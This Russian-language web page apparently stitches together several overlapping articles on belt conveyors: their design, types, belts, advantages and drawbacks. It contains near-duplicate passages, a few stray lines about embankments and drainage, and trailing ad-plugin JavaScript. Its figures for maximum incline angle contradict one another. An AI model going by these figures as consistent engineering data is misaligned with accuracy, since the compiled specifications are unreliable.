328 просмотров
Рейтинг статьи
1 звезда2 звезды3 звезды4 звезды5 звезд
Загрузка...

Устройство и применение наклонные ленточных конвейеров

Ленточный конвейер

Ленточный конвейер – это непрерывно работающее транспортирующее устройство, где рабочей поверхностью является полимерная, пластиковая или резинотканевая лента. Назначение — транспортировка различных видов грузов и материалов. По праву считается наиболее популярным и самым рентабельным типом транспортеров, применяемых для перемещения штучных или сыпучих грузов на любом складе. Может обеспечивать бесперебойную работу производства.

Преимущества

Основными преимуществами ленточного конвейера являются:

  • универсальность применения;
  • высокая производительность;
  • надежность конструкции;
  • простота обслуживания.

Назначение

По назначению применяются они следующим образом:

  • прямолинейное транспортирование продукции;
  • подъем и спуск изделий;
  • изменение траектории движения продукции;
  • многоуровневая подача и отвод товара;
  • сортировка и распределение потоков продукции.

Применение

Конвейер используется во многих отраслях промышленности:

  • производство автокомпонентов;
  • производство и упаковка продуктов питания;
  • деревообработка и мебельное производство;
  • мясо-рыбо-птицепереработка;
  • фармацевтическая промышленность;
  • производство бытовой химии;
  • легкая промышленность;
  • конвейер находит применение в производстве напитков;
  • молочная и масло-жировая промышленность;
  • складская логистика;
  • химическая промышленность;
  • текстильная промышленность;
  • металлообрабатывающая промышленность;
  • переработка овощей и ягод, консервирование;
  • целлюлозно-бумажная промышленность;
  • сборка приборов, компьютерной и бытовой техники и др.

Разновидности

Ленточные конвейеры разделяются на несколько видов. Об особенностях каждого из них можно узнать ниже:

  1. Прямой. Предназначен для транспортирования грузов по прямой траектории. Регулировка скорости частотным преобразователем позволяет плавно настраивать движение ленты под производственные процессы. Для мобильности может оснащаться колесами со стопорными пластинами, что дает возможность перемещать ленточный конвейер от одного технологического участка к другому.
  2. Наклонный. Предназначен для наклонного транспортирования грузов с одного уровня на другой. Применяется на складах для механизации процесса погрузки-выгрузки (разгрузки) автотранспорта и транспортировки изделий между этажами. Может использоваться в закрытом помещении и на открытом воздухе. Угол наклона применяется в диапазоне от 20 до 60 градусов и может быть регулируемым или фиксированным. Устанавливаемый максимальный угол наклона в ленточном конвейере зависит от таких факторов: габарит груза, выбранная скорость, особенности поверхностного материала, вес и позиция центра тяжести продукции, внешние влияния (температура, влажность). Лента оснащается поперечными лопатками различной высоты или подбирается с поверхностью антискольжения.
  3. Наклонный ленточный конвейер с горизонтальными участками (Г-образный, L-образный и Z-образный). Предназначен для транспортирования сыпучих или мелкоштучных грузов с одной высоты на другую. На прямых и наклонных участках ленточного конвейера применяются гофрированные борта и поперечные лопатки для исключения просыпания. Транспортирует грузы под углом от 20 до 80 градусов. Может оснащаться загрузочным бункером и лотком для выгрузки.
  4. Поворотный. Предназначен для изменения траектории движения штучных грузов или многорядного потока продукции. Поворотный ленточный конвейер может изменять направление движения под углами 90 ° или 180 °. В качестве рабочей поверхности применяются тонкие и прочные ленты из полиуретана.
  5. Многоуровневый. Применяется для одновременной, многоуровневой подачи и отвода сырья, сухих материалов и субстанций, тары на участках разделки, фасовки, укладки, сборки и упаковки продукции.

Конструкция

Ленточный конвейер в базовом исполнении включает в себя: секции металлического каркаса на опорах, конвейерную ленту, подложку из металлического настила или гравитационных роликов, барабаны, приводной вал и вал натяжения, подшипниковые узлы, гравитационные ролики, червячный мотор-редуктор. Производительность измеряется кубометрами поставляемых товаров в час.

Мощность электродвигателя и типоразмер редуктора зависят от заданной нагрузки на погонный метр конвейера, его длины, ширины ленты, скорости перемещения груза и угла наклона.

Лента

Она изготавливается из прочных синтетических материалов, обладающих повышенной стойкостью к истирающим и разрывным нагрузкам. Применяется с рабочим покрытием из поливинилхлорида (ПВХ), полиуретана (ПУ), тефлона, силикона, хлопка, фетра, различными структурами рабочей поверхности, толщины, усилием натяжения и т. д. Таким образом, полимерные ленты для конвейера обладают всем спектром полезных и необходимых свойств, благодаря которым можно использовать их в любой сфере промышленности.

Дополнительное оснащение

Ленточный конвейер к базовой комплектации дополнительно оснащается:

  • электрический шкаф управления для подключения транспортера к сети 220В;
  • ограничительные и разделительные борта;
  • клиновидные профили для центрирования ленты на валах;
  • колесные опоры с фиксаторами;
  • электрический шкаф управления с преобразователем частоты для регулировки скорости и плавного пуска конвейера;
  • приемный бункер;
  • валы малого диаметра для «ножевого» перехода продукции;
  • защитный кожух;
  • опоры с регулируемой высотой;
  • поддон для сбора просыпающегося продукта;
  • реверсивное движения ленты вперед/назад;
  • поперечные лопатки;
  • выгружной лоток;
  • выносной кнопочный пост;
  • оптические датчики положения груза;
  • тросовый выключатель или кнопки аварийной остановки конвейера;
  • сталкивающие пневмоцилиндры;
  • узлы разворота и сортировки продукции;
  • тензометрические датчики веса продукции;
  • пошаговый режим движения ленты.

Чтобы узнать больше о работе конвейеров, особенностях их эксплуатации, свяжитесь с нами!

Виды ленточных конвейеров и их применение

Ленточные конвейеры получили широкое распространение в различных сферах деятельности. Их применяют для транспортировки штучных и сыпучих грузов в сельском хозяйстве, металлургии, на складах и портах, при добыче полезных ископаемых и в других областях. Популярность оборудования обусловлена универсальностью в эксплуатации и большой производительностью.

Основной рабочий инструмент конвейера — замкнутая в кольцо гибкая лента, которая огибает приводной и натяжной барабаны. Между ними на раме размещены ролики, служащие опорой для транспортера. Загрузка продукции осуществляется с одной стороны конвейерной ленты, выгрузка — с противоположной.

Устройство ленточного конвейера

К основным частям ленточного конвейера относятся:

  • рама;
  • натяжной барабан;
  • приводной барабан;
  • транспортерная лента;
  • ролики конвейера.

Для скольжения транспортерной ленты на раме располагаются специальные ролики. Для её натяжения используются два крупных ролика, которые носят названия барабанных. Один из них – натяжной. Он зафиксирован на подшипниковом узле и используется для регулировки натяжении ленты. Второй – приводной барабан. Он установлен на противоположном конце конвейера и имеет специальный вал, соединенный через редуктор с электродвигателем. Вращательное движение, передаваемое от мотор-редуктора или электродвигателя к приводному барабану, приводит ленту транспортера в движение.

Особенности оборудования

Перечислим наиболее распространенные типы ленточных конвейеров:

  • прямые. В основе конструкции — гибкая лента, которую поддерживают роликоопоры. Производительность может достигать 25 тыс. т/ч, длина — 10 км. Используются на складах, в сортировочных цехах и т. п.;
  • желобчатые. Основание ленты — желобчатая роликовая опора из стали или алюминия. Такие конвейеры получили широкое распространение в машиностроении, энергетике, деревообрабатывающей промышленности, строительстве, при добыче угля и на предприятиях переработки отходов;
  • наклонные. Основное отличие таких конвейеров от прямых — направленность под углом к горизонтали. Оборудование применяется, когда необходимо транспортировать грузы вверх и вниз. Наклонные конвейеры применяют в разных сферах промышленности, на складах и в логистических комплексах;
  • смешанного типа. Одна часть такого конвейера прямая, другая — наклонная. Выделяют L-образные и Z-образные ленты смешанного типа. Чаще всего используются в условиях ограниченного пространства;
  • поворотные. Лента такого транспортера перемещается по ползунам, разделенным на сегменты. Оборудование включает систему передачи вращательного момента. Поворотный конвейер применяется во многих отраслях, наибольшее распространение получил на кондитерских предприятиях;
  • телескопические. Такой транспортер позволяет корректировать длину и угол наклона во время работы. Для внесения изменений не нужно отключать оборудование и освобождать его от грузов. Конвейер такого типа актуален для транспортировки сыпучих материалов в карьерах, на речных и морских судах и пр.

Виды лент конвейера

Для перемещения штучных грузов используются конвейеры с гладкими лентами. Для сыпучих и мелких грузов отлично подходят рифленые разновидности. На сегодняшний день используются ленты с различными типами рифления:

  • в виде треугольников;
  • в форме ромбов;
  • пирамидальный тип и др.

При этом груз можно перемещать под углом до 45°. Это возможно за счет поперечно установленных перегородок, высота которых достигает 20 см.

Для максимальной эффективности работы предприятия используются конвейеры с различными типами лент:

  • резинотканевыми;
  • брезентовыми;
  • сетчатыми;
  • специальными пищевыми и т. д.

В зависимости от особенностей груза или товара процесс транспортировки происходит на специально предназначенном конвейере. Важно, что устанавливать транспортеры можно в отапливаемых помещениях, а также на открытом воздухе или в зданиях без обогрева. Для максимально эффективной работы лент рекомендуется эксплуатировать их при температурном режиме от –50 до +45°С. При необходимости на конвейер может быть установлено дополнительное оборудование, которое позволяет транспортировать грузы при температуре до 200 °С, обеспечивая надежную работу всех встроенных механизмов.

Как правило, ленточные конвейеры оборудуются специальными устройствами:

  • очищающими ленту от просыпавшихся материалов;
  • предотвращающими падение грузов.

Для производства конвейеров используются новейшие технологии, которые позволяют совершенствовать их конструктивно-технологические параметры. Это приводит к снижению оборачиваемости ленты, уменьшению количества промежуточных перегрузок и увеличению срока эксплуатации.

Ленты из морозостойких материалов, а также использование особых сортов смазки, предназначенных для холодных условий, позволяют расширить область применения устройств и эксплуатировать их в районах Крайнего Севера.

Преимущества использования ленточного конвейера

К основным достоинствам ленточных конвейеров относятся:

  • высокая скорость движения ленты, которая повышает производительность и эффективность промышленных процессов;
  • возможность транспортировки грузов на большие расстояния (известны случаи, когда длина грузонесущего полотна достигала 5 км);
  • минимальное потребление энергии;
  • надежность конструкции;
  • универсальность ленточного конвейера (с их помощью можно транспортировать различные грузы даже в наклонном положении. Однако с увеличением длины конвейера и угла наклона уменьшается его скорость).

Назначение, устройство и основные типы ленточных конвейеров серии ТЛС

Назначение ленточных конвейеров

Практически во всех отраслях промышленности используются ленточные конвейеры, иначе называемые ленточные транспортеры (от англ. belt conveyor), которые обеспечивают непрерывность процессов транспортировки различных видов грузов и материалов. Их применение позволяет доставлять до нужного объекта штучные грузы и материалы, имеющие сыпучую/кусковую структуры. Транспортировка, как в горизонтальном, так и в наклонном положении (при угле наклона 18°), обеспечивается за счет особой конструкции устройства. Благодаря использованию специальных транспортеров в карьерах и шахтах, осуществляется доставка не только добываемых природных ископаемых к погрузочному пункту или на предприятие, но и людей.

Преимущества ленточных конвейеров перед другими способами транспортировки налицо. Во-первых, благодаря значительной скорости движения ленты обеспечиваются высокая эффективность и производительность промышленных процессов. Во-вторых, подобный конвейер потребляет относительно мало энергии. В-третьих, надежная конструкция устройства даже при длительном сроке эксплуатации обеспечивает качественное выполнение задач.

Транспортировку штучных грузов обычно производят на конвейерах, имеющих ленты гладкого типа. Для мелких грузов и сыпучих материалов предусмотрена возможность перемещения по ленте с рифленой структурой основания. Именно такой тип устройства ленточного конвейера обеспечивает максимальное КПД.

Большинство ленточных конвейеров оснащено специальными устройствами, предупреждающими падение грузов, и очищающими поверхность от просыпавшихся материалов. Постоянное расширение областей применения возможно благодаря новым технологиям, позволяющим улучшить конструктивно-технологические параметры конвейеров.

Ленточными конвейерами являются машины непрерывного действия, основным элементом которых является прорезиненная вертикально замкнутая лента, огибающая концевые барабаны, один из которых, как правило, является приводным, другой – натяжным.

На верхней ветви ленты перемещается транспортируемый груз, она является грузонесущей (рабочей), нижняя ветвь является холостой (нерабочей). На всем протяжении трассы лента поддерживается роликоопорами верхней и нижней ветвей, в зависимости от конструкции которых лента имеет плоскую или желобчатую форму.

Поступательное движение конвейер получает от фрикционного привода, необходимое первоначальное натяжение ленты обеспечивается натяжным устройством. Груз поступает на ленту через одно или несколько загрузочных устройств, разгрузка производится с концевого барабана в приемный бункер (концевая) или в любом пункте вдоль трассы конвейера с помощью барабанных или плужковых разгружателей (промежуточная). Очистка ленты от прилипших частиц груза осуществляется с помощью очистных устройств.

Для обеспечения устойчивого положения груза на ленте угол наклона конвейера должен быть на 10–15° меньше угла трения груза о ленту в покое, т. к. во время движения лента на роликоопорах встряхивается и груз сползает вниз. На конвейерах, имеющих наклонный участок, обязательно устанавливается тормоз.

По конструкции и назначению ленточные конвейеры выполняются общего назначения ГОСТ 22644–77 и специальные.

По типу ленты ленточные конвейеры: с прорезиненной лентой; со стальной цельнопрокатной лентой; с проволочной лентой. Наибольшее распространение получили конвейеры с прорезиненной лентой.

По расположению на местности ленточные конвейеры выполняются стационарными и подвижными; передвижными и переносными; переставными (для открытых разработок); надводными, плавающими на понтонах.

По профилю трассы ленточные конвейеры (рис. 2): горизонтальные; наклонные; комбинированные: наклонно-горизонтальные и горизонтально-наклонные с одним или несколькими перегибами и со сложной трассой.

Стационарные ленточные конвейеры серии ТЛС имеют все основные элементы: приводную и натяжную станции, ленту, барабаны, ролики, электрооборудование, металлический каркас. Общая длина конвейера набирается из промежуточных (2 м) и дополнительных (0,5; 1; 1,5 м) секций. Металлоконструкции конвейеров серии ТЛС крепятся к полу или подвешиваются к потолочному перекрытию.

Основные типы ленточных конвейеров.

В зависимости от расположения основных элементов и условий их установки конвейеры серии ТЛС подразделяются на следующие типы:

ТЛС НГМБ — напольный горизонтальный с приводом от моторбарабана, движение ленты реверсивное.

ТЛС НГ – напольный горизонтальный с приводом, встроенным в металлоконструкцию приводной станции. Выпускается с высоким и низким бортовыми ограждениями.

ТЛС НГД — напольный горизонтальный двухъярусный, что позволяет более эффективно использовать установочные площади.

ТЛС ПГ – подвесной горизонтальный, крепится к потолочному перекрытию с помощью специальных тяг, привод может быть встроенным или с мотор барабаном. Выпускается только с высоким бортовым ограждением.

ТЛС НГОЛ – напольный горизонтальный с использованием обратной ветви конвейера, что позволяет в случае необходимости возвращать к месту загрузки порожнюю тару.

ТЛС НН – напольный наклонный, имеющий угол наклона до 16°.

ТЛС ПН – подвесной наклонный, у которого элементы конструкции крепятся к потолочному перекрытию здания на специальных тягах.

ТЛС НПН – напольно-подвесной наклонный, крепится как к полу, так и к потолочному перекрытию. Угол наклона до 16°, при необходимости его увеличения должны применяться специальные ленты

Поперечные профили набережных и береговой полосы: На городских территориях берегоукрепление проектируют с учетом технических и экономических требований, но особое значение придают эстетическим.

Общие условия выбора системы дренажа: Система дренажа выбирается в зависимости от характера защищаемого.

Организация стока поверхностных вод: Наибольшее количество влаги на земном шаре испаряется с поверхности морей и океанов (88‰).

Ленточный конвейер — устройство, применение

Перед тем как рассказать об устройстве ленточного конвейера, давайте ознакомимся с этим видом промышленного оборудования.

Практически во всех отраслях промышленности используются ленточные конвейеры, иначе называемые ленточные транспортеры (от англ. belt conveyor), которые обеспечивают непрерывность процессов транспортировки различных видов грузов и материалов. Их применение позволяет доставлять до нужного объекта штучные грузыиматериалы, имеющие сыпучую/кусковую структуры. Транспортировка, какв горизонтальном, так и в наклонном положении (при угле наклона 18°), обеспечивается за счет особой конструкции устройства. Благодаря использованию специальных транспортеров в карьерах и шахтах, осуществляется доставка не только добываемых природных ископаемых к погрузочному пункту или на предприятие, но и людей.

Горизонтальные и комбинированные трассы, по которым производится транспортировка, могут достигать длины в 10-12 км. Производительность конвейеров измеряется кубометрами перемещаемых грузов в час. В некоторых областях достаточным количеством считается несколько кубометров, а в других необходимо осуществлять транспортировку нескольких тысяч кубометров в час. По ширине конвейерные ленты встречаются как узкие (30 см), так и достаточно широкие (2 м).

Различают конвейерные ленты, перемещающие грузы с разной скоростью, от 0,5 до 5 м/с. В соответствии с принятыми нормативами при ручной разборке грузов, скорость движения ленты должна быть минимальной. Выбор ленты зависит от тех, параметров, которые необходимы для транспортировки конкретного вида грузов. Таким образом, во внимание принимаются степень трения об ленту, скорость и способ загрузки конвейера, а такжеего угол наклона. Различают два вида лент: ПВХ-лента или резинотканевая.

Устройство ленточного конвейера

Основными частями ленточного конвейера являются рама, приводной барабан, натяжной барабан, ролики конвейера, транспортерная лента.

На раме закреплены ролики, по которым транспортерная лента скользит, и перемещает груз в пространстве. Для натяжения ленты служит два больших ролика, называемых барабанами. Один из них — натяжной, закреплен на подшипниковом узле и служит для регулировке натяжении ленты. Другой — приводной барабан конвейера, закреплен на противоположном конце конвейера и имеет специальный вал, который соединен с электродвигателем через редуктор. Собственно с помощью передачи вращательного движения от электродвигателя или мотор-редуктора к приводному барабану, и происходит движение ленты транспортера.

Преимущества ленточных конвейеров перед другими способами транспортировки налицо. Во-первых, благодаря значительной скорости движения ленты обеспечиваются высокая эффективность и производительность промышленных процессов. Во-вторых, подобный конвейер потребляет относительно мало энергии. В-третьих, надежная конструкция устройства даже при длительном сроке эксплуатации обеспечивает качественное выполнение задач.

Транспортировку штучных грузов обычно производят на конвейерах, имеющих ленты гладкого типа. Для мелких грузов и сыпучих материалов предусмотрена возможность перемещения по ленте с рифленой структурой основания. Именно такой тип устройства ленточного конвейера обеспечивает максимальное КПД. Существует несколько видов рифления – в виде ромбов, треугольников, пирамидальный тип и др. Транспортируемый груз можно перемещать под наклоном до 45° за счет поперечно установленных перегородок высотой до 20 см. Эффективная работа предприятия возможна, благодаря наличию конвейеров, имеющих разные типы лент: резинотканевую, брезентовую, сетчатую, специальную пищевую. В зависимости от характеристик конкретного груза/товара процесс транспортировки осуществляется на специально предназначенном для него конвейере.

Установка транспортеров возможна не только в отапливаемых помещениях, но и в зданиях, не имеющих обогрева, и на открытом воздухе. Для оптимальной работы транспортеров рекомендуется их эксплуатация при температуре от-50 до +45 °С. Вспомогательное оборудование, установленное на конвейере, позволяет осуществлять процессы транспортировки грузов при температуре, достигающей 200°С, обеспечивая надежную работу встроенных механизмов.

Большинство ленточных конвейеров оснащено специальными устройствами, предупреждающими падение грузов, и очищающими поверхность от просыпавшихся материалов. Постоянное расширение областей применения возможно благодаря новым технологиям, позволяющим улучшить конструктивно-технологические параметры конвейеров. Усовершенствование процессов работы транспортеров снижает оборачиваемость ленты, уменьшает количество промежуточных перегрузок и повышает срок эксплуатации ленточных конвейеров. Появление лент из морозостойких материалов и особых сортов смазки, предназначенных для холодных условий, область применения и особенности устройства ленточных конвейеров расширяется вплоть до районов, относящихся к Крайнему Северу.

Ленточный конвейер: работа, схема и устройство. Эксплуатация ленточных конвейеров

Сегодня сложно себе представить высокопроизводительное производство без использования конвейера. Для перемещения грузов, в том числе и сыпучих, используют замкнутые ленты. Можно говорить о том, что это агрегат непрерывного действия, которые имеет грузонесущий орган (гибкая лента). Давайте более подробно разберемся с тем, что же такое ленточный конвейер, каково его назначение, сфера применения, а также, в чем заключаются тонкости эксплуатации данного оборудования.

Область применения и назначение

На сегодняшний день это один из наиболее перспективных видов транспорта, который практически незаменим при больших грузопотоках. Кроме того, ленточный конвейер является обязательной частью любого тяжелого и легкого производства. Он используется в металлургии, для транспортировки сыпучих материалов, в пищевой промышленности, медицине и так далее. Принцип действия и устройство во всех случаях практически одинаковые. Отличия могут заключаться в виде ленты, ее грузоподъемности и гибкости, а также мощности привода. В большинстве случаев такого рода конвейер позволяет частично автоматизировать производство и сократить количество ручного труда. С учетом этого рассматриваемым транспортируемым машинам предъявляются жесткие требования. По большей части это касается прочности, производительности и взаимозаменяемости изношенной ленты. Агрегаты способны работать при диапазоне температур от -50 до +45, что обуславливается техническими характеристиками несущего органа.

Работа и устройство ленточного конвейера

Лента – рабочий орган конвейера, предварительно натягивается и соединяется. Силой трения между лентой и приводным барабаном она приводится в действия. Причем определяющим фактором является сила трения, за счет которой движется грузонесущий и тяговый орган. Для исключения прогиба ленты по длине конвейера устанавливают роликоопоры, на которые она и опирается во время движения. Как вы видите, устройство агрегата довольно простое. Интересным моментом является быстрота замены износившейся ленты. Делается это следующим образом: во время работы конвейера в месте стыковки грузонесущий орган распаривается и к нему, путем наклепки или вулканизации, крепят новую ленту. После того как приводной барабан делает полный цикл, закрепляется второй конец. Такой подход хорош тем, что практически нет простоя оборудования во время работы, так как монтаж осуществляется за несколько минут, хотя многое зависит от вида тягового органа. Для очистки ленты устанавливаются щетки, а во избежание перекоса используются центрирующие ролики. Устройство ленточного конвейера таково, что агрегат можно использовать во многих отраслях промышленности. Сейчас давайте пойдем дальше.

Преимущества использования ленточного конвейера

Давайте рассмотрим основные преимущества, которыми обладает данный агрегат. Главный плюс ленточного конвейера заключается в том, что с его помощью можно транспортировать грузы на очень большое расстояние. В некоторых случаях длина грузонесущего органа может достигать 3-5 километров. Никакой другой конвейер не может быть таким длинным. Обусловлено это большим весом, сложной конструкцией и, что самое главное, высокой стоимостью оборудования. В случае с ленточным конвейером нет никаких проблем. Еще одно неоспоримое достоинство заключается в высокой производительности. Иногда скорость может достигать 6-10 м/с, при ширине ленты 2,4-3,0 метра. В этом случае производительность может превышать 20-30 тысяч тон в час. Кроме того, ленточный конвейер относится к универсальным транспортирующим линиям. Обусловлено это тем, что можно перемещать самые различные грузы. Еще одно важное достоинство – возможность перемещения грузов в наклонном положении. С увеличением угла и длительности конвейера уменьшается его скорость.

Недостатки ленточных конвейеров

Стоит сказать о том, что есть и существенные недостатки, ограничивающие сферу применения транспортирующих устройств такого типа. Основной минус – высокая цена ленты и роликов. В большинстве случаев тяговый и грузонесущий орган обходится примерно в 30% от общей стоимости установки, что немало. Хотя тут многое зависит от назначения, а также технических характеристик (материал, количество слоев и т.п.). Еще один недостаток заключается в том, что барабан ленточного конвейера движет ленту при помощи трения. Это ограничивает угол подъема, поэтому он не может превышать 20 градусов. Помимо этого, достаточно проблематично перемещать пылевидные грузы, которые в процессе движения могут частично улетучиваться и рассыпаться. Затруднительно работать и при слишком низких температурах, как и при слишком высоких. Термической воздействие изменят характеристики гибкой ленты, а также приводит к разрушению.

Эксплуатация ленточных конвейеров

Как было отмечено несколько выше, ЛК может работать при высоких скоростях. Это делает ленточный конвейер более производительным по сравнению с другими транспортирующими агрегатами. Основная особенность эксплуатации заключается в том, что имеется возможность создания сложных маршрутов. К примеру, можно сделать сложную трассу с изгибами, горизонтальными и наклонными участками. Даже при тяжелых условиях эксплуатации (перепады температур, высокая запыленность и т.п.) ленточный конвейер обеспечивает надежную работу без сбоев. В большинстве случае при правильном обслуживании можно четко предсказать период выхода тягового органа из строя. Это позволяет эксплуатировать устройство без простоя. На сегодняшний день разработано огромное количество приводов, которые обеспечивали работу ЛК. При увеличении длины устанавливается несколько двигателей, которые обеспечивают нормальную эксплуатацию. При выходе одного привода, второй будет работать. В этом случае производительность хоть и понизится, но не будет простоя.

Устройство и конструкция натяжной и приводной станции

Привод ленточного конвейера состоит из двигателя, редуктора и нескольких соединительных муфт. В местах изгиба устанавливают роликовые или отклоняющие батареи, создающие плавный переход. Вся конструкция, вместе с приводом, монтируется на фундамент, который должен быть заложен предварительно. Приводная станция состоит из привода, а также загрузочной коробки, а та часть, где находится натяжное устройство и загрузочная воронка, именуется, как натяжная станция. Между этими двумя станциями находится средняя часть конвейера, она выполнена из нескольких линейных секций. Последние состоят из одинаковых линейных секций, соединенных между собой болтами. А сейчас давайте поговорим о том, какие бывают ленточные конвейеры и в чем их принципиальное отличие. Тут есть несколько интересных моментов.

Классификация ленточных конвейеров

Существуют некоторые признаки, по которым условно данные устройства можно разделить на несколько групп:

  • по области применения: бывают общего назначения, специальные и подземные (транспортировка людей, катучие, а также передвижные);
  • по форме трассы: простые (с прямолинейным участком), сложные (с наклонной ломаной трассой), а также криволинейные или пространственные (изгиб в плоскости грузонесущего органа);
  • по направлению движения груз: подъемные и спускные;
  • по форме ленты и размещению груза: бывает плоская и желобчатая лента в различных модификациях;
  • по углу наклона трассы: горизонтальные, наклонные, крутонаклонные (угол более 22 градусов) и вертикальные.

Стоит понимать, что, помимо этого, схема ленточного конвейера предусматривает использования различного тягового и грузонесущего органа. Ленты бывают резинотканевыми, резинотросовыми, проволочными, а также стальными. Тип ленты выбирается исходя из того, в каких условиях она будет работать. К примеру, стальные тяговые органы применяются для работы при высоких температурах (до 850 градусов), точно так же, как и проволочные, которые могут транспортировать грузы при рабочей температуре 1100 градусов по Цельсию.

Шахтные конвейеры

Отдельно нужно сказать несколько слов о транспортирующих устройствах, работающих под землей. Примечательно то, что схема ленточного конвейера такого типа несколько отличается. В несколько раз увеличивается степень надежности. Обусловлено это тем, что грузонесущий орган используется для транспортировки людей, а также тяжелых штучных грузов, и все это выполняется в стесненных условиях. Привод, например, имеет два натяжных барабана, что позволяет сделать устройство не только более мощным, но и обеспечить достаточную надежность.

Заключение

На сегодняшний день популярность ленточных конвейеров постоянно растет. По этой простой причине постоянно разрабатываются все новые типы грузонесущих органов. В частности важно создавать высокопрочные термоустойчивые детали. К примеру, нужно увеличивать срок эксплуатации роликов, которые постоянно выходят их строя. Можно говорить о том, что работа ленточного конвейера считается довольно дешевой. Если перемещать груз на расстояние до 30 км при помощи ЛК, то это будет куда экономичнее, нежели делать это автомобильным транспортом.

Виды ленточных конвейеров и их применение

Классификация конвейеров

На сегодняшний день существует несколько видов конвейеров, классификация которых зависит от конструкции. По тягловому органу выделяют ленточный, инерционный, винтовой, канатный, цепной конвейер. По грузонесущему органу – ковшовый, скребковый, люлечный, ленточный, пластинчатый конвейер.

Различается также оборудование по виду перемещаемого груза (сыпучий, штучный) и по условиям эксплуатации (стационарный, передвижной, модульный, подвесной и пр.).

Применение и принцип действия ленточного конвейера

В современном мире ленточный конвейер получил самое широкое распространение, благодаря универсальности. Оборудование используют при транспортировке грузов сыпучих, штучных, кусковых и других видов. Устройство представляет собой конвейерную ленту непрерывного движения, перемещающую разнообразную продукцию, как упакованную в таре, так и россыпью. Применяется также на поточном производстве в целях межоперационного транспортирования. Принцип работы устройства прост.

Основным рабочим инструментом является замкнутая в кольцо гибкая лента, огибающая натяжной и приводной барабаны. Между ними на раме с определенным шагом размещены роликовые опоры, на которые опирается транспортерная лента.

Загрузка транспортируемой продукции осуществляется с одной стороны конвейера, выгрузка – с противоположной.

Типы ленточных конвейеров

Ленточные конвейеры могут различаться конструктивно. Наиболее распространены следующие типы:

Конвейеры прямые.

В основе – бесконечная гибкая лента, холостую и рабочую ветви которой поддерживают роликоопоры.

Приводной барабан сообщает транспортерной ленте поступательное движение; достаточное натяжение ленты обеспечивает натяжное устройство. Производительность прямых конвейеров может достигать 25 тысяч т/ч, а длина – 10 км.

Желобчатые конвейеры.

Основание транспортерной ленты – желобчатая роликовая опора, выполненная из стального или алюминиевого профиля.

Наибольшее распространение устройства получили в машиностроении, деревообрабатывающей промышленности, в строительстве, энергетике, при добыче угля. Также может использоваться конвейер для сортировки вторичных отходов при их переработке.

Конвейеры наклонные.

Основное устройств данного типа от прямых конвейеров – направленность под углом к горизонтали. Принцип действия используется тот же.

Может выполняться, как конвейер с регулировкой угла наклона или же с заданным углом наклона.

Оборудование с большим успехом применяется при необходимости транспортировки штучных и насыпных грузов вверх и вниз на складских и логистических комплексах, в разных сферах промышленности. Наклонные конвейеры – устройства универсальные, их можно использовать и в цехах и на открытом воздухе.

Конвейеры смешанного типа.

Некоторая часть конвейерной трассы – прямая, другая наклонная.

Среди оборудования этого типа выделяют L-образный и Z-образный конвейер. Последний вид устройств считается одним из самых сложных. Используют их, как правило, при необходимости установки в ограниченном пространстве, там, где невозможно сконструировать линию, состоящую из обычных прямых и наклонных конвейеров.

Конвейеры поворотные.

В данном случае лента транспортера перемещается в стальной основе по ползунам, разделенным на сегменты. Отличительная особенность оборудования – наличие системы передачи вращательного момента.

Поворотный конвейер применяется во многих отраслях промышленности, наибольшее распространение получил в кондитерском производстве.

Конвейеры телескопические.

Оборудование – оптимальный вариант для транспортировки сыпучих материалов на речных и морских судах, в карьерах и пр. Телескопический конвейер позволяет изменять длину и угол наклона в процессе работы. Останавливать устройство и освобождать его от транспортируемого груза нет необходимости. Процесс загрузки и выгрузки при использовании оборудования максимально эффективен. Конечно, перечисленными видами далеко не исчерпывается конвейерное оборудование. Существует множество устройств, которые выполняют самые разнообразные общие и специфические задачи.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
